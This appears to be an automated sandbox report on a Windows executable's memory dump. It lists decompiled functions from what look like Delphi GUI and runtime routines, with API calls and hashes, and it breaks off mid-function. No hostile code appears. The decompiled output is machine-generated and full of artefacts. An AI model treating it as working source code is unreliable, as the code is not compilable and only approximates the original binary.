                                                                                • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                • String ID: lu@
                                                                                • API String ID: 902310565-2585274229
                                                                                • Opcode ID: 7b17a811859c93707dfb15206b41d5fa76ba35a1cd5d73a52b60511870c90dc5
                                                                                • Instruction ID: 1868f2d57648088d78e42551569d2a182e29cfcd79893dd67f987c243af7d502
                                                                                • Opcode Fuzzy Hash: 7b17a811859c93707dfb15206b41d5fa76ba35a1cd5d73a52b60511870c90dc5
                                                                                • Instruction Fuzzy Hash: BD411730900658DFDB60DF64CC81BDAB7F4AB49304F4144EAE508AB295D778AE84CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E004489F4(intOrPtr __eax, void* __edx) {
                                                                                				char _v8;
                                                                                				signed short _v10;
                                                                                				intOrPtr _v16;
                                                                                				char _v17;
                                                                                				char _v24;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr _t40;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t48;
                                                                                				void* _t51;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t67;
                                                                                				void* _t69;
                                                                                				void* _t71;
                                                                                				intOrPtr _t72;
                                                                                
                                                                                				_t69 = _t71;
                                                                                				_t72 = _t71 + 0xffffffec;
                                                                                				_t51 = __edx;
                                                                                				_v16 = __eax;
                                                                                				_v10 =  *((intOrPtr*)(__edx + 4));
                                                                                				if(_v10 == 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					if(GetKeyState(0x10) < 0) {
                                                                                						_v10 = _v10 + 0x2000;
                                                                                					}
                                                                                					if(GetKeyState(0x11) < 0) {
                                                                                						_v10 = _v10 + 0x4000;
                                                                                					}
                                                                                					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                                                                						_v10 = _v10 + 0x8000;
                                                                                					}
                                                                                					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                                                                					_t34 =  *0x487bf0; // 0x22e0e50
                                                                                					E00425F8C(_t34,  &_v24);
                                                                                					_push(_t69);
                                                                                					_push(0x448af2);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t72;
                                                                                					while(1) {
                                                                                						_v17 = 0;
                                                                                						_v8 = E004486F8(_v16, 2, _v10 & 0x0000ffff);
                                                                                						if(_v8 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						if(_v24 == 0 || _v17 != 2) {
                                                                                							_pop(_t64);
                                                                                							 *[fs:eax] = _t64;
                                                                                							_push(0x448af9);
                                                                                							_t40 =  *0x487bf0; // 0x22e0e50
                                                                                							return E00425F84(_t40);
                                                                                						} else {
                                                                                							continue;
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                					_t42 =  *0x487bf0; // 0x22e0e50
                                                                                					E00425F8C(_t42,  &_v8);
                                                                                					_push(_t69);
                                                                                					_push(0x448ac7);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t72;
                                                                                					_v17 = E004488A0( &_v8, 0, _t69);
                                                                                					_pop(_t67);
                                                                                					 *[fs:eax] = _t67;
                                                                                					_push(0x448ace);
                                                                                					_t48 =  *0x487bf0; // 0x22e0e50
                                                                                					return E00425F84(_t48);
                                                                                				}
                                                                                				L14:
                                                                                			}

                                                                                APIs
                                                                                • GetKeyState.USER32(00000010), ref: 00448A18
                                                                                • GetKeyState.USER32(00000011), ref: 00448A2A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: State
                                                                                • String ID:
                                                                                • API String ID: 1649606143-3916222277
                                                                                • Opcode ID: 760088a0574d20811a064ff9e2c06d33e914e5721c87f6c8f0373b8d15e519a0
                                                                                • Instruction ID: 2f67ee1c30486cca61a85eaf8b30acdb55de4a75bb1a0bb337f63a262a7cdb16
                                                                                • Opcode Fuzzy Hash: 760088a0574d20811a064ff9e2c06d33e914e5721c87f6c8f0373b8d15e519a0
                                                                                • Instruction Fuzzy Hash: 5931E534A04348EFEB11DBA5D85569DB7F5EB48708F5584BFE800B7291EBB85A00C758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E00424428(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _t62;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t67;
                                                                                				void* _t77;
                                                                                				void* _t78;
                                                                                				intOrPtr _t79;
                                                                                				intOrPtr _t80;
                                                                                
                                                                                				_t77 = _t78;
                                                                                				_t79 = _t78 + 0xfffffff8;
                                                                                				_v8 = __eax;
                                                                                				_v12 = E00403584(1);
                                                                                				_push(_t77);
                                                                                				_push(0x4244af);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t79;
                                                                                				 *((intOrPtr*)(_v12 + 8)) = __edx;
                                                                                				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                                                                                				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                                                                                				_t80 = _t79 + 0xc;
                                                                                				 *((char*)(_v12 + 0x70)) = _a8;
                                                                                				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                                                                                					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                                                                                				}
                                                                                				_t62 =  *0x4120e4; // 0x412130
                                                                                				 *((intOrPtr*)(_v12 + 0x6c)) = E00403764(_a4, _t62);
                                                                                				_pop(_t64);
                                                                                				 *[fs:eax] = _t64;
                                                                                				_push(0x487a44);
                                                                                				L00406840();
                                                                                				_push(_t77);
                                                                                				_push(0x42450f);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t80;
                                                                                				E00422EBC( *((intOrPtr*)(_v8 + 0x28)));
                                                                                				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                                                                                				E00422EB8(_v12);
                                                                                				_pop(_t67);
                                                                                				 *[fs:eax] = _t67;
                                                                                				_push(E00424516);
                                                                                				_push(0x487a44);
                                                                                				L00406988();
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(00487A44,00000000,?,?), ref: 004244CB
                                                                                • RtlLeaveCriticalSection.KERNEL32(00487A44,00424516,00487A44,00000000,?,?), ref: 00424509
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID: 0!A
                                                                                • API String ID: 3168844106-1450072167
                                                                                • Opcode ID: 0edc17d4ed0b1c1ab8b1ba459e1a3a70054d6c8da7edbbee95644b22a89fcf66
                                                                                • Instruction ID: 58ae4afe19b813cdd8764f3c44f7d698b9faef3fda2e75d9dafaa0c865d1a70e
                                                                                • Opcode Fuzzy Hash: 0edc17d4ed0b1c1ab8b1ba459e1a3a70054d6c8da7edbbee95644b22a89fcf66
                                                                                • Instruction Fuzzy Hash: 9421A175A04304AFC701DF69D89198DBBF5FB4C720B6281AAE804A7751C674EE80CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00435A5C(void* __eflags, intOrPtr _a4) {
                                                                                				char _v5;
                                                                                				struct tagRECT _v21;
                                                                                				struct tagRECT _v40;
                                                                                				void* _t40;
                                                                                				void* _t45;
                                                                                
                                                                                				_v5 = 1;
                                                                                				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                                                                				_t45 = E00414000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                                                                				if(_t45 <= 0) {
                                                                                					L5:
                                                                                					_v5 = 0;
                                                                                				} else {
                                                                                					do {
                                                                                						_t45 = _t45 - 1;
                                                                                						_t40 = E00413FA4(_t44, _t45);
                                                                                						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                                                                							goto L4;
                                                                                						} else {
                                                                                							E00435040(_t40,  &_v40);
                                                                                							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                                                                							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                                                                								goto L4;
                                                                                							}
                                                                                						}
                                                                                						goto L6;
                                                                                						L4:
                                                                                					} while (_t45 > 0);
                                                                                					goto L5;
                                                                                				}
                                                                                				L6:
                                                                                				return _v5;
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$EqualIntersect
                                                                                • String ID: @
                                                                                • API String ID: 3291753422-2766056989
                                                                                • Opcode ID: 5875d3f469a07d2fec264fccf843e68af22faf804a9a75e07dadbcdbde7529ca
                                                                                • Instruction ID: a4dc38a6c8dfb3a5b63c1f0ba833f3846fe2b2ebe5734ae6dc21ff9bf713c91f
                                                                                • Opcode Fuzzy Hash: 5875d3f469a07d2fec264fccf843e68af22faf804a9a75e07dadbcdbde7529ca
                                                                                • Instruction Fuzzy Hash: 95118C31A046489BC701EA6DC894BDF7BEC9F48318F0402A6FD04EB382D779DD058794
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 69%
                                                                                			E0044C690(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v16;
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr _t24;
                                                                                				char _t25;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t27;
                                                                                				void* _t31;
                                                                                				void* _t32;
                                                                                				intOrPtr _t33;
                                                                                
                                                                                				_t31 = _t32;
                                                                                				_t33 = _t32 + 0xfffffff4;
                                                                                				_v8 = 0;
                                                                                				_t24 =  *0x46bb24; // 0x0
                                                                                				_v12 = _t24;
                                                                                				_t25 =  *0x46bb30; // 0x0
                                                                                				_v16 = _t25;
                                                                                				 *0x46bb24 = __eax;
                                                                                				 *0x46bb30 = 0;
                                                                                				_push(_t31);
                                                                                				_push(0x44c733);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t33;
                                                                                				_push(_t31);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t33;
                                                                                				EnumThreadWindows(GetCurrentThreadId(), E0044C640, 0);
                                                                                				_t13 =  *0x46bb30; // 0x0
                                                                                				_v8 = _t13;
                                                                                				_pop(_t26);
                                                                                				 *[fs:eax] = _t26;
                                                                                				_t27 = 0x44c6fc;
                                                                                				 *[fs:eax] = _t27;
                                                                                				_push(0x44c73a);
                                                                                				_t5 =  &_v16; // 0x42ea72
                                                                                				 *0x46bb30 =  *_t5;
                                                                                				_t17 = _v12;
                                                                                				 *0x46bb24 = _t17;
                                                                                				return _t17;
                                                                                			}
















                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0044C6DF
                                                                                • EnumThreadWindows.USER32(00000000,0044C640,00000000), ref: 0044C6E5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Thread$CurrentEnumWindows
                                                                                • String ID: rB
                                                                                • API String ID: 2396873506-3432471736
                                                                                • Opcode ID: a2ed862f726dce6ea9b7ab6a43d9daf756f3b3595bf60e5d1b422f0ddc4ac1ab
                                                                                • Instruction ID: 784cd37228573f0c4d139dee04941cc700bad5c37d42a676d98ffa6d26d47428
                                                                                • Opcode Fuzzy Hash: a2ed862f726dce6ea9b7ab6a43d9daf756f3b3595bf60e5d1b422f0ddc4ac1ab
                                                                                • Instruction Fuzzy Hash: C801C4B4A05704AFE301CF65DC51916BBF8EB8DB10B628476E800D3B60F7746400CE5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0042641C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t15;
                                                                                				void* _t16;
                                                                                				intOrPtr _t18;
                                                                                				signed int _t19;
                                                                                				void* _t20;
                                                                                				intOrPtr _t21;
                                                                                
                                                                                				_t19 = _a12;
                                                                                				if( *0x487abf != 0) {
                                                                                					_t16 = 0;
                                                                                					if((_t19 & 0x00000003) != 0) {
                                                                                						L7:
                                                                                						_t16 = 0x12340042;
                                                                                					} else {
                                                                                						_t21 = _a4;
                                                                                						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                                                                							goto L7;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t18 =  *0x487aa0; // 0x42641c
                                                                                					 *0x487aa0 = E00426184(3, _t15, _t18, _t19, _t20);
                                                                                					_t16 =  *0x487aa0(_a4, _a8, _t19);
                                                                                				}
                                                                                				return _t16;
                                                                                			}














                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 0042646A
                                                                                • GetSystemMetrics.USER32 ref: 0042647C
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MetricsSystem$AddressProc
                                                                                • String ID: MonitorFromPoint
                                                                                • API String ID: 1792783759-1072306578
                                                                                • Opcode ID: d416c4985ba4413774987f096a320964d63c72627901ada663c10769bb17c054
                                                                                • Instruction ID: cd85fc9c8645eeba43d65e48dc59c82577749165faf05199f4873ef963c6ea0d
                                                                                • Opcode Fuzzy Hash: d416c4985ba4413774987f096a320964d63c72627901ada663c10769bb17c054
                                                                                • Instruction Fuzzy Hash: 2F01A231305224AFDB006F51EC84B5FBB55EB40758F91442AF9598B612C375DE40C7AC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E004262F4(intOrPtr* _a4, signed int _a8) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr* _t14;
                                                                                				intOrPtr _t16;
                                                                                				signed int _t17;
                                                                                				void* _t18;
                                                                                				void* _t19;
                                                                                
                                                                                				_t17 = _a8;
                                                                                				_t14 = _a4;
                                                                                				if( *0x487abe != 0) {
                                                                                					_t19 = 0;
                                                                                					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                                                                						_t19 = 0x12340042;
                                                                                					}
                                                                                				} else {
                                                                                					_t16 =  *0x487a9c; // 0x4262f4
                                                                                					 *0x487a9c = E00426184(2, _t14, _t16, _t17, _t18);
                                                                                					_t19 =  *0x487a9c(_t14, _t17);
                                                                                				}
                                                                                				return _t19;
                                                                                			}













                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 00426345
                                                                                • GetSystemMetrics.USER32 ref: 00426351
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MetricsSystem$AddressProc
                                                                                • String ID: MonitorFromRect
                                                                                • API String ID: 1792783759-4033241945
                                                                                • Opcode ID: f6389e7ca689c4f8fe7b67f29ea4c7e91d631a6b7a859c0c381da6731af0c2b2
                                                                                • Instruction ID: 2649c8152ff0a4a618a293e30726504c2b2cf717a0c2621c365be1b3126a70b4
                                                                                • Opcode Fuzzy Hash: f6389e7ca689c4f8fe7b67f29ea4c7e91d631a6b7a859c0c381da6731af0c2b2
                                                                                • Instruction Fuzzy Hash: E501A232B041249BDB10CB59FC85B1EB765E741764FA5846BEC08CB603C678DD40CBAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E0043D724(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
                                                                                				intOrPtr _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				void* _t22;
                                                                                				void* _t28;
                                                                                
                                                                                				_v8 = __ecx;
                                                                                				_t28 = __eax;
                                                                                				_t22 = 0;
                                                                                				if(E00442554(__eax) != 0) {
                                                                                					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
                                                                                					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
                                                                                						E0043D788(_t28, _t32);
                                                                                						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
                                                                                						_t5 =  &_a4; // 0x43375c
                                                                                						E0043D514(__edx,  *_t5, _v8,  &_v16);
                                                                                						_t7 =  &_v12; // 0x43375c
                                                                                						_push( *_t7);
                                                                                						_push(_v16);
                                                                                						_push( *((intOrPtr*)(_t28 + 0x6c)));
                                                                                						L004260FC();
                                                                                						asm("sbb ebx, ebx");
                                                                                						_t22 = __edx + 1;
                                                                                					}
                                                                                				}
                                                                                				return _t22;
                                                                                			}









                                                                                APIs
                                                                                  • Part of subcall function 0043D788: 734518F0.COMCTL32(?,00000000,0043D74D,00000000,00000000,00000000), ref: 0043D7A0
                                                                                  • Part of subcall function 0043D514: ClientToScreen.USER32(?,0043D7D0), ref: 0043D52C
                                                                                  • Part of subcall function 0043D514: GetWindowRect.USER32 ref: 0043D536
                                                                                • 73451850.COMCTL32(?,?,\7C,?,00000000,00000000,00000000), ref: 0043D76F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: 73451873451850ClientRectScreenWindow
                                                                                • String ID: \7C$\7C
                                                                                • API String ID: 1718620977-1242633874
                                                                                • Opcode ID: 365f2af23587cf31549f760d55cd3af2694efc9b2ed9bdd57577858ccde5046b
                                                                                • Instruction ID: a175693acc41a737ad07227ac984dcca9a23f6f09638294ce6bc0965f6750621
                                                                                • Opcode Fuzzy Hash: 365f2af23587cf31549f760d55cd3af2694efc9b2ed9bdd57577858ccde5046b
                                                                                • Instruction Fuzzy Hash: 9DF04F76B00209AB8B10DEAE98C18AEF3ACAB4C214B00817AF918D3301D675ED058B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004065CD(void* __eax, void* __ebx, void* __esi) {
                                                                                				long _t10;
                                                                                
                                                                                				 *((intOrPtr*)(__ebx + 0x69)) =  *((intOrPtr*)(__ebx + 0x69)) + __esi;
                                                                                				 *0x46b008 = 2;
                                                                                				 *0x48704a = 2;
                                                                                				 *0x487000 = E004052A8;
                                                                                				if(E004033FC() != 0) {
                                                                                					_t5 = E0040342C();
                                                                                				}
                                                                                				E004034F0(_t5);
                                                                                				 *0x487050 = 0xd7b0;
                                                                                				 *0x48721c = 0xd7b0;
                                                                                				 *0x4873e8 = 0xd7b0;
                                                                                				E004051A0();
                                                                                				 *0x48703c = GetCommandLineA();
                                                                                				 *0x487038 = E00401388();
                                                                                				_t10 = GetCurrentThreadId();
                                                                                				 *0x487030 = _t10;
                                                                                				return _t10;
                                                                                			}





                                                                                APIs
                                                                                  • Part of subcall function 004033FC: GetKeyboardType.USER32(00000000), ref: 00403401
                                                                                  • Part of subcall function 004033FC: GetKeyboardType.USER32(00000001), ref: 0040340D
                                                                                • GetCommandLineA.KERNEL32 ref: 00406620
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00406634
                                                                                  • Part of subcall function 0040342C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040344E
                                                                                  • Part of subcall function 0040342C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403481
                                                                                  • Part of subcall function 0040342C: RegCloseKey.ADVAPI32(?,004034A4,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403497
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                • String ID: 84t
                                                                                • API String ID: 3316616684-964373480
                                                                                • Opcode ID: 5be99165020f628b7bf262819b4d6f32d6e913febd8137d6059eb3d1bf4bde94
                                                                                • Instruction ID: 87c8d1285b935a8802c7f007350c1fe5a13bb065e2eb45d0b00c20e4d5df6914
                                                                                • Opcode Fuzzy Hash: 5be99165020f628b7bf262819b4d6f32d6e913febd8137d6059eb3d1bf4bde94
                                                                                • Instruction Fuzzy Hash: E6F012B080834095E701FFB598A620D3E61AF03348770597FE8406A2A7EB7CC1449BEE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E00433464(struct tagPOINT* __eax) {
                                                                                				struct HWND__* _t8;
                                                                                				void* _t9;
                                                                                
                                                                                				_push(__eax->y);
                                                                                				_t8 = WindowFromPoint( *__eax);
                                                                                				if(_t8 != 0) {
                                                                                					while(E0043341C(_t8, _t9) == 0) {
                                                                                						_t8 = GetParent(_t8);
                                                                                						if(_t8 != 0) {
                                                                                							continue;
                                                                                						}
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				L3:
                                                                                				return _t8;
                                                                                			}






                                                                                APIs
                                                                                • WindowFromPoint.USER32(M3C,?,00000000,00433046,?,-0000000C,?), ref: 0043346A
                                                                                  • Part of subcall function 0043341C: GlobalFindAtomA.KERNEL32 ref: 00433430
                                                                                  • Part of subcall function 0043341C: GetPropA.USER32 ref: 00433447
                                                                                • GetParent.USER32(00000000), ref: 00433481
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AtomFindFromGlobalParentPointPropWindow
                                                                                • String ID: M3C
                                                                                • API String ID: 3524704154-2629677723
                                                                                • Opcode ID: 98702e36936e0e1a5cccc6fada8a93c2d553a3460fb0d51efd6170255a84fd1d
                                                                                • Instruction ID: faf4f0c274cddd3732b65d19d4330b845a9b5ea9ebc25192a453e9e8282a3d01
                                                                                • Opcode Fuzzy Hash: 98702e36936e0e1a5cccc6fada8a93c2d553a3460fb0d51efd6170255a84fd1d
                                                                                • Instruction Fuzzy Hash: 6FD0C7613007021B9F133FA55DC151765885F3D34A700A47EB5016F363DE6ECD181718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                C-Code - Quality: 100%
                                                                                			E0040724C(signed int _a4) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				char _v7;
                                                                                				char _v8;
                                                                                				char _v9;
                                                                                				char _v10;
                                                                                				char _v11;
                                                                                				char _v12;
                                                                                				char _v13;
                                                                                				char _v14;
                                                                                				char _v15;
                                                                                				char _v16;
                                                                                				char _v17;
                                                                                				char _v18;
                                                                                				char _v19;
                                                                                				void _v20;
                                                                                				long _v24;
                                                                                				int _v28;
                                                                                				int _v32;
                                                                                				void* _v36;
                                                                                				void _v291;
